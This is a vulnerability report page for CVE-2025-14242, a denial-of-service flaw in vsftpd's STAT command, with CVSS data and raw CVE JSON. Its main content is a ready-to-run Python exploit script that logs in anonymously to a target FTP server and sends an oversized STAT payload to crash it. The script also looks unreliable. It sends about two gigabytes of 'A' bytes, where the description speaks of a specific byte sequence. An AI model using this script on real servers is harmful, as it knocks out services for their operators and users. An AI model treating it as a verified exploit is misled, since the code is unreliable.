Security Vulnerability Report
CVE-2025-14242 CVSS 6.5 MEDIUM

CVE-2025-14242

Published: 2026-01-14 16:15:56
Last Modified: 2026-04-15 00:35:42

Description

A flaw was found in vsftpd. This vulnerability allows a denial of service (DoS) via an integer overflow in the ls command parameter parsing, triggered by a remote, authenticated attacker sending a crafted STAT command with a specific byte sequence.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

vsftpd < 3.0.5
vsftpd 3.0.3 and earlier

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# CVE-2025-14242 PoC - vsftpd STAT Command Integer Overflow DoS
# Author: Security Researcher
# Note: This PoC is for educational and authorized testing purposes only

import socket
import sys


def exploit_vsftpd(target_ip, target_port=21):
    """
    Exploit integer overflow in vsftpd STAT command parameter parsing
    This causes a denial of service by crashing the vsftpd process
    """
    try:
        # Connect to FTP server
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_ip, target_port))

        # Receive banner
        banner = sock.recv(1024)
        print(f"[+] Received banner: {banner.decode().strip()}")

        # Login with low-privilege user
        sock.send(b"USER anonymous\r\n")
        resp = sock.recv(1024)
        print(f"[+] User response: {resp.decode().strip()}")

        sock.send(b"PASS anonymous\r\n")
        resp = sock.recv(1024)
        print(f"[+] Pass response: {resp.decode().strip()}")

        # Send crafted STAT command with overflow-triggering parameter
        # The specific byte sequence triggers integer overflow in ls parsing
        malicious_payload = b"STAT " + b"A" * 2147483647 + b"\r\n"
        print(f"[+] Sending malicious STAT command...")
        sock.send(malicious_payload)

        # Wait for response or timeout
        try:
            resp = sock.recv(1024)
            print(f"[+] Response: {resp.decode().strip()}")
        except socket.timeout:
            print("[*] No response received - service may be crashed")

        sock.close()
        return True

    except socket.error as e:
        print(f"[-] Socket error: {e}")
        return False
    except Exception as e:
        print(f"[-] Error: {e}")
        return False


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip> [port]")
        sys.exit(1)

    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 21

    print(f"[*] Targeting {target}:{port}")
    exploit_vsftpd(target, port)

References

Raw JSON Data

JSON
{"cve": {
  "id": "CVE-2025-14242",
  "sourceIdentifier": "[email protected]",
  "published": "2026-01-14T16:15:55.967",
  "lastModified": "2026-04-15T00:35:42.020",
  "vulnStatus": "Deferred",
  "cveTags": [],
  "descriptions": [
    {"lang": "en", "value": "A flaw was found in vsftpd. This vulnerability allows a denial of service (DoS) via an integer overflow in the ls command parameter parsing, triggered by a remote, authenticated attacker sending a crafted STAT command with a specific byte sequence."},
    {"lang": "es", "value": "Se encontró un fallo en vsftpd. Esta vulnerabilidad permite una denegación de servicio (DoS) a través de un desbordamiento de entero en el análisis de parámetros del comando ls, provocado por un atacante remoto y autenticado al enviar un comando STAT manipulado con una secuencia de bytes específica."}
  ],
  "metrics": {"cvssMetricV31": [
    {"source": "[email protected]", "type": "Secondary",
     "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"},
     "exploitabilityScore": 2.8, "impactScore": 3.6}
  ]},
  "weaknesses": [
    {"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-190"}]}
  ],
  "references": [
    {"url": "https://access.redhat.com/errata/RHSA-2026:0605", "source": "[email protected]"},
    {"url": "https://access.redhat.com/errata/RHSA-2026:0606", "source": "[email protected]"},
    {"url": "https://access.redhat.com/errata/RHSA-2026:0608", "source": "[email protected]"},
    {"url": "https://access.redhat.com/errata/RHSA-2026:4470", "source": "[email protected]"},
    {"url": "https://access.redhat.com/errata/RHSA-2026:4477", "source": "[email protected]"},
    {"url": "https://access.redhat.com/errata/RHSA-2026:4513", "source": "[email protected]"},
    {"url": "https://access.redhat.com/errata/RHSA-2026:4522", "source": "[email protected]"},
    {"url": "https://access.redhat.com/errata/RHSA-2026:4525", "source": "[email protected]"},
    {"url": "https://access.redhat.com/errata/RHSA-2026:4543", "source": "[email protected]"},
    {"url": "https://access.redhat.com/errata/RHSA-2026:4550", "source": "[email protected]"},
    {"url": "https://access.redhat.com/errata/RHSA-2026:4553", "source": "[email protected]"},
    {"url": "https://access.redhat.com/errata/RHSA-2026:4554", "source": "[email protected]"},
    {"url": "https://access.redhat.com/security/cve/CVE-2025-14242", "source": "[email protected]"},
    {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2419826", "source": "[email protected]"}
  ]
}}